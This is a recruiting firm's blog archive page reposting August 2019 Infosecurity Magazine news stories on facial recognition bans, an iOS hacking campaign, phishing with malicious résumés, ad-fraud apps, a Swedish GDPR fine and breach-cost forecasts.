Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for August 2019

Municipal Government Calls For Facial Recognition Ban

Municipal Government Calls For Facial Recognition Ban

Brookline has become the third Massachusetts municipality to call for a ban on the use of facial recognition technology by a municipal government. 

The proposed ban, put forward in a warrant article by town meeting member Amy Hummel, is likely to be considered by town representatives in November.

statement in support of Hummel’s proposal was issued by the Massachusetts branch of the American Civil Liberties Union (ACLU), which recently launched the Press Pause on Face Surveillance campaign. An ACLU-backed bill currently before Massachusetts legislators proposes a statewide moratorium on the government's use of facial recognition technology.

Kade Crockford, director of the Technology for Liberty Program at ACLU Massachusetts, said: “For too long, face surveillance technology has gone unregulated, posing a serious threat to our basic civil rights and civil liberties. In the absence of state or national action, municipal governments have taken the first steps towards sensible policy."

Somerville was the first city in Massachusetts to come out against the technology. A proposal to ban its use in police investigations and municipal surveillance programs was passed by Somerville City Council in June by a vote of 11 to 0. 

Last month the city of Cambridge joined the party when Mayor Marc McGovern proposed a ban on the use of facial recognition technology in the city.  

These three New England cities aren't alone in their rejection of this particular type of tech. In May this year San Francisco banned the use of facial recognition technology by the police and other agencies, while Oakland, California, City Council last month voted unanimously to ban the use of facial recognition by city departments, and Berkeley is considering following suit. 

bill to place a five-year moratorium on police using facial-recognition technology is currently under consideration in Michigan, and the tech has raised concerns at a national level too.

In July the U.S. House of Representative passed an amendment to the Intelligence Authorization Act for Fiscal Year 2020 that requires the director of national intelligence to report the U.S. government's use of facial recognition technology, detailing its accuracy and efforts to protect and potential consequences for human and civil rights.

There is an argument to be made for the use of facial recognition technology by the government to secure airports and border installations, but it remains to be seen how the growing concerns over its impact on the freedom of the general public will play out in the U.S. at municipal and state level.

Source: Information Security Magazine

Face-Off

Face-Off

Brookline has become the third Massachusetts municipality to call for a ban on the use of facial recognition technology by a municipal government. 

The proposed ban, put forward in a warrant article by town meeting member Amy Hummel, is likely to be considered by town representatives in November.

statement in support of Hummel’s proposal was issued by the Massachusetts branch of the American Civil Liberties Union (ACLU), which recently launched the Press Pause on Face Surveillance campaign. An ACLU-backed bill currently before Massachusetts legislators proposes a statewide moratorium on the government's use of facial recognition technology.

Kade Crockford, director of the Technology for Liberty Program at ACLU Massachusetts, said: “For too long, face surveillance technology has gone unregulated, posing a serious threat to our basic civil rights and civil liberties. In the absence of state or national action, municipal governments have taken the first steps towards sensible policy."

Somerville was the first city in Massachusetts to come out against the technology. A proposal to ban its use in police investigations and municipal surveillance programs was passed by Somerville City Council in June by a vote of 11 to 0. 

Last month the city of Cambridge joined the party when Mayor Marc McGovern proposed a ban on the use of facial recognition technology in the city.  

These three New England cities aren't alone in their rejection of this particular type of tech. In May this year San Francisco banned the use of facial recognition technology by the police and other agencies, while Oakland, California, City Council last month voted unanimously to ban the use of facial recognition by city departments, and Berkeley is considering following suit. 

bill to place a five-year moratorium on police using facial-recognition technology is currently under consideration in Michigan, and the tech has raised concerns at a national level too.

In July the U.S. House of Representative passed an amendment to the Intelligence Authorization Act for Fiscal Year 2020 that requires the director of national intelligence to report the U.S. government's use of facial recognition technology, detailing its accuracy and efforts to protect and potential consequences for human and civil rights.

There is an argument to be made for the use of facial recognition technology by the government to secure airports and border installations, but it remains to be seen how the growing concerns over its impact on the freedom of the general public will play out in the U.S. at municipal and state level.

Source: Information Security Magazine

Hack Exploited Apple Users for Two Years

Hack Exploited Apple Users for Two Years

Researchers from Google's Project Zero have discovered a threat campaign that operated against users of Apple iOs devices for two years. 

Earlier this year Google's Threat Analysis Group (TAG) discovered that a small collection of hacked websites was being used to carry out indiscriminate watering-hole attacks against visitors, using iPhone zero-day.  

Victims were ensnared just by visiting one of the hacked websites, which are estimated to have attracted thousands of visitors per week. This simple action alone was enough to inadvertently trigger an exploit server to attempt to install a monitoring implant on the user's device.

Hackers exploited flaws in iPhone software to stealthily take over a victim's device and access a user's contact info, media files and GPS location, together with data from InstagramWhatsAppTelegram and Gmail.

TAG collected five separate, complete and unique iPhone exploit chains, covering most versions of the device from iOS 10 through to the most recent version, iOS 12. 

"This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years," said Project Zero's Ian Beer.

He went on to say that investigations into the root causes of the vulnerabilities revealed code that appeared to have never worked correctly, had missed the quality assurance checks or "likely had little testing or review before being shipped to users."

TAG found 14 different software flaws, seven of which affected the iPhone's Safari web browser. The group reported the issues to Apple with a seven-day deadline on February 1, 2019, which resulted in the out-of-band release of iOS 12.1.4 on February 7, 2019. 

After summarizing the findings, Beer warned users to wise up to the very real threat of cyber-attacks and to consider where the data they constantly put into their devices may one day end up.    

He said: "The reality remains that security protections will never eliminate the risk of attack if you're being targeted. 

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives yet also as devices which, when compromised, can upload their every action into a database to potentially be used against them."

Source: Information Security Magazine

Biometric ID Cards Ahoy!

Biometric ID Cards Ahoy!

India is introducing biometric identity cards to keep tabs on the country's rapidly growing number of seafarers.

Recent years have seen an unprecedented 43% increase in the number of seafarers in India, from 108,446 in 2013 to 154,349 in 2018. And India, according to the International Chamber of Shipping, is currently the world's third-biggest supplier of seafaring officers. 

This vigorous growth follows various policy changes brought in by the Indian government between 2014 and 2018, including the lifting of bans on the introduction of new training courses and the opening of new maritime training institutes.

The new ID cards, dubbed Biometric Seafarer Identity Documents, will use facial biometric recognition technology and come with two optical security features: micro prints/micro texts and a unique guilloche pattern.

Each of India's approximately 350,000 seafarers who hold a valid Continuous Discharge Certificate are eligible for the new BSID, which will be rolled out over the next two years. 

The cards will carry an inbuilt chip that can be read at point-of-sale readers and ATMs and by immigration officers with the right gear. 

To make the cards, data will be captured to create a map of the seafarer's face, which will then be cross-matched with their passport photo using software designed by the Centre for Development of Advanced Computing (C-DAC) in Mumbai. The information captured will be fed into a national database, which will be accessible worldwide. 

Indian minister of shipping Mansukh Lal Mandaviya said: “The new document will give a foolproof identification to our seafarers which will facilitate their movement, provide ease of getting jobs and help in identifying them from any location in the world.”

Eight centers have been sent up in coastal locations around the country at Mumbai, Kolkata, Chennai, Goa, New Mangalore, Kochi, Vizag and Kandla to issue the cards. A ninth center has also been established in Noida, which lies roughly 1,000 km inland near New Delhi.

Source: Information Security Magazine

Fileless Malware Detections Soar 265% in 2019

Fileless Malware Detections Soar 265% in 2019

Fileless malware, BEC, digital extortion and ransomware attacks all grew significantly between 2018 and the first six months of this year, according to new data from Trend Micro.

The security giant blocked over 26.8 billion threats in the first half of the year, over 90% of which were email-borne, according to its mid-year roundup report, Evasive Threats, Pervasive Effects.

Of these detections, it spotted a massive 265% year-on-year increase in fileless techniques designed to stay hidden from traditional tools, by executing in a system’s memory, residing in the registry, or abusing legitimate tools.

Although cryptocurrency mining was the most detected threat in 1H 2019, the more eye-catching growth in detection went to digital extortion attempts, which jumped 319% from the second half of 2018, and BEC, which increased 52% over the same period.

Ransomware is also back on the rise: with related files, emails and URLs recording a 77% increase on the previous six months.

Although the number of new ransomware families dropped by 55% over the period, there were concerning signs of existing variants containing destructive capabilities beyond file encryption.

Ryuk can prevent infected systems from even rebooting, for example, while LockerGoga also modifies user account passwords. Some, such as BitPaymer, use fileless techniques such as abuse of the common PsExec tool.

One surprise from the report was the re-emergence of exploit kits, which recorded a 136% increase compared to the first half of 2018, although the volume of detections at 321,000 is far below the peak activity observed three or four years ago.

These have also been observed in conjunction with fileless techniques.

“One notable exploit kit from the first half of 2019 was Greenflash Sundown, which was used by the ShadowGate campaign through an upgraded version capable of living off the land, that is, using an updated PowerShell loader to filelessly execute the payload,” the report explained.

The volume of threats blocked by Trend Micro in the first half of 2019 increased by around six billion from the same time last year, which could signal either a ramp-up in cybercrime activity or improved detection.

Source: Information Security Magazine

HackerOne Announces Five New $1m White Hats

HackerOne Announces Five New $1m White Hats

The UK has its first $1 million white hat hacker, after bug bounty platform HackerOne announced five new security researchers had reached the milestone.

The five millionaire hackers are: Mark Litchfield (@mlitchfield) from the UK, Nathaniel Wakelam (@nnwakelam) from Australia, Frans Rosen (@fransrosen) from Sweden, Ron Chan (@ngalog) from Hong Kong, and Tommy DeVoss (@dawgyg) from the US.

They join 19-year-old Argentinian Santiago Lopez, known as @try_to_hack, whose efforts were announced back in March.

“Hacking can open doors to anyone with a laptop and curiosity about how to break things,” said Litchfield. “I hope our achievements will encourage other hackers, young and old, to test their skills, become part of our supportive community, rake in some extra $$$s along the way and make the internet a much safer place for people.”

Some $21m has been paid out via HackerOne to researchers over the past year, an increase of $10m on the previous 12 months.

The platform claimed that Russian, Indian and US researchers account for over a third (36%) of awarded bounties. However, as today’s news illustrates, there are clearly opportunities for white hats from all regions.

HackerOne claimed a top researcher can earn over 40 times the annual median wage in Argentina and more than six times that of Sweden.

However, MIT research released in January painted a different picture, revealing that it’s difficult to make good money as an ethical hacker and that talented white hats could live better as pen testers or in-house researchers.

It studied 61 HackerOne bounty programs over 23 months — including ones run for Twitter, Coinbase, Square and Facebook.

The top seven participants in the Facebook program made just $34,255 per year from an average of 0.87 bugs per month, while from the entire HackerOne dataset it was estimated that participants made just $16,544 from 1.17 bugs per month.

HackerOne argued in response to Infosecurity that the data analyzed in the study was not representative.

Source: Information Security Magazine

Phishing Campaign Hides Malware in Resumes

Phishing Campaign Hides Malware in Resumes

For many people, applying for a new job is a soul-crushing activity on a par with cleaning the bathroom in a six-person student dorm room. 

Landing a new role can mean spending hours searching for positions, rewriting your résumé and cover letter countless times and using LinkedIn to badger people you haven't spoken to for years into giving you a reference. 

Now cyber-criminals have given job seekers a fresh obstacle to contend with after targeting companies with a phishing campaign that hides malware in résumés sent as email attachments.

The advanced campaign, which uses multiple anti-analysis methods to deliver Quasar remote access tool (RAT), was uncovered by phishing defense service provider Cofense Intelligence

Quasar RAT by itself isn't dodgy, but this legitimate open-source remote administration tool that can be found on GitHub has a history of being abused.

“This campaign is concerning as the US-CERT identifies the Quasar RAT as a favored tool of advanced persistent threat actors. This means that the most dedicated cyber-criminals are seeking to utilize this tool to exploit networks," said Carl Wearn, head of e-crime at Mimecast.

From the outside the campaign appeared simple but a closer looked showed that the threat actors had done their homework. First, they used an easily accessible tool that makes attributing the campaign to a specific threat actor as easy as teaching a rhino the clarinet. 

Second, they laced the résumé attachment document being used to deliver Quasar RAT with a multitude of measures designed to deter detection, including password protection and encoded macros. 

Announcing its find, Cofense said that "educating employees on new phishing trends is the best way of countering a campaign such as this."

Wearn added: "I would urge individuals, particularly those working within HR departments and used to receiving résumés or CVs, to be particularly vigilant for this form of attack. Organizations should ensure they have an up-to-date antivirus solution that can effectively resolve and detect this form of attack.”

Source: Information Security Magazine

Facial Recognition Technology Creates a Fine Mess in Sweden

Facial Recognition Technology Creates a Fine Mess in Sweden

Student attendance is an issue in Sweden. A 2015 report by the Organisation for Economic Co-operation and Development (OECD) found Sweden to have "one of the largest proportions of students who arrive late for school among OECD countries." 

Schools in the nation's capital have struggled to get students to show up at all. A 2016 study of 58 schools in Stockholm, found a third of students (33.5%) admitted to playing truant for at least one day during the current academic year.

A new attendance problem came to light this week when a school in the northern municipality of Skellefteå was fined by the Swedish Data Protection Authority (DPA) for trialing facial recognition technology on its students without valid consent. 

In a project dubbed Future Classroom, Anderstorp High School teamed up with Nordic software and services company Tieto to test automatic student registration using tags, smartphone apps and facial recognition technology over a three-week period in the last quarter of 2018. 

The aim of the project, which involved 22 students, was to give back to teachers at the high school the 17,280 hours they spend each year registering students in lessons.

The Swedish DPA issued Skellefteå municipality with the country’s first GDPR violation fine after concluding that the project violated articles 5, 9, 35 and 36. The amount was set at 200,000 SKr (approximately $20,000) out of a maximum 10,000,000 SKr that can be imposed on public authorities under Swedish law.

Consent was obtained from students who participated in the project, however the Swedish DPA found that a consensual agreement could not have a valid legal basis "given the clear imbalance between the data subject and the controller."

Tommy Lindmark, IT strategist for Skellefteå municipality, told Infosecurity Magazine: “I was surprised by the [DPA’s] decision and think that our work has been very well done. But the issue is sensitive in Sweden and legislation and technological development are not keeping pace.

“I hope that we can get law and technology to work together so that we can make the public sector more efficient.”

The fact that the DPA only learned about the Future Classroom project after it was covered by Swedish national TV was a deciding factor in determining how steep the fine should be. 

Jenny Bård, legal advisor to the Swedish DPA, told Infosecurity Magazine that working in the school's favor was the fact that the test had only involved 22 pupils for a short time.

"On the other end," said Bård, "there has been a disproportionate registration lacking legal ground, and the municipality (controller of the public school) has not enough considered the high risks related to the test. 

"Children have been registered with special categories of data. And the information has reached the DPA only through media. The amount has in this case been considered to be effective, proportionate and dissuasive."

The DPA fine has not quashed efforts to introduce automatic student registration into Skellefteå’s schools. 

Lindmark said: “We have a clear consent and right now we are thinking about how to proceed. The question is what does consent mean? To be continued.”

Tieto project manager Fredrika Ling said: “Tieto is now analyzing this situation together with the municipality. It is important to create a good environment with clear frameworks for this type of projects for the future to enable innovation and use of latest technologies for better services.”

Source: Information Security Magazine

Drained Batteries? These Stealth Ad-Clicking Apps Could Be to Blame

Drained Batteries? These Stealth Ad-Clicking Apps Could Be to Blame

If you didn't think it was possible for ads to become any more infuriating, then you are a) optimistic and b) wrong. 

Cybersecurity firm Symantec has discovered two malicious apps in which hidden ads are being automatically clicked to generate revenue for threat actors.  

This newly discovered tactic uses embedded advertisements – strategically positioned beyond a mobile device’s viewable screen area – to initiate an automated ad-click process. 

The ghost-clicking action, which goes on out of sight and without the knowledge of the device user, drains batteries, slows performance and potentially increases mobile data usage by secretly sending the user on frequent visits to websites connected with the ads.

This underhanded sneakery was spotted taking place on devices that had downloaded the notepad app Idea Note and the fitness app Beauty Fitness, both of which were available on the Google Play Store. 

The apps, published by a developer known as Idea Master, have a collective download count of 1.5 million users. 

The cunning creators of the apps packed the apps using legitimate hackers originally developed to protect the intellectual property of Android applications. Android packers can change the entire structure and flow of an Android Package Kit (APK) file, making it difficult for security researchers who want to decipher the APK’s behavior. 

This complexity in design, together with the hidden nature of the ad clicking, allowed the apps' malicious activities to go unnoticed on Google Play for nearly a year.

Symantec has informed Google of the observed behavior and the apps have now been removed from the Play Store.

Users of Idea Note: OCR Text Scanner, GTD, Color Notes and Beauty Fitness: daily workout, best HIIT coach are advised to manually uninstall them from their devices. 

A spokesperson for Symantec advised app users to only install apps from trusted sources and to install a mobile security app to protect their device and data.

Source: Information Security Magazine

Global Breach Costs Set to Top $5 Trillion By 2024

Global Breach Costs Set to Top $5 Trillion By 2024

The cost of global data breaches to victim organizations will rise to over $5 trillion by 2024 as regulatory fines take hold and firms become more dependent on digital systems, according to new predictions from Juniper Research.

The figures come from the UK-based market watcher’s latest report, The Future of Cybercrime & Security: Threat Analysis, Impact Assessment & Mitigation Strategies 2019-2024.

The firm claimed that breach costs will rise by 11% annually over the report period, from a figure of $3 trillion in 2019.

However, it argued that although mega-breaches of large volumes of data may make headlines they won’t necessarily impact costs directly, as fines and lost business aren’t closely linked to the size of a breach.

That’s somewhat at odds with data from IBM, which has been running a Cost of a Data Breach study for many years.

While the average global cost of a breach is now at $3.9m, it estimated that when incidents involve the compromise of over one million records this figure soars to $42m, while breaches of 50 million records are estimated to cost companies $388m on average.

Juniper claimed that AI will play an increasingly important role in cybercrime, enabling hackers to map the behavior of security systems to more easily circumvent defenses.

It also predicted that more attention will be paid to staff training and awareness in future, so that organizations can optimize their cybersecurity spending.

“All businesses need to be aware of the holistic nature of cybercrime and, in turn, act holistically in their mitigation attempts,” argued report author Susan Morrow. “As social engineering continues unabated, the use of human-centric security tactics needs to take hold in enterprise security.”

Franklyn Jones of Cequence Security argued that there may also be significant secondary costs to breaches beyond the headline $5 trillion figure.

“I’m referring to the growing number of malicious, automated bot attacks that are fueled by the billions of credentials stolen from these initial breaches,” he said. 

“Those secondary attacks, which are even harder to detect than the initial data breaches, tend to focus on business logic abuse, stolen IP, and financial fraud. The cost of these types of attacks are often under-reported, but are likely in the billions of dollars.”

Source: Information Security Magazine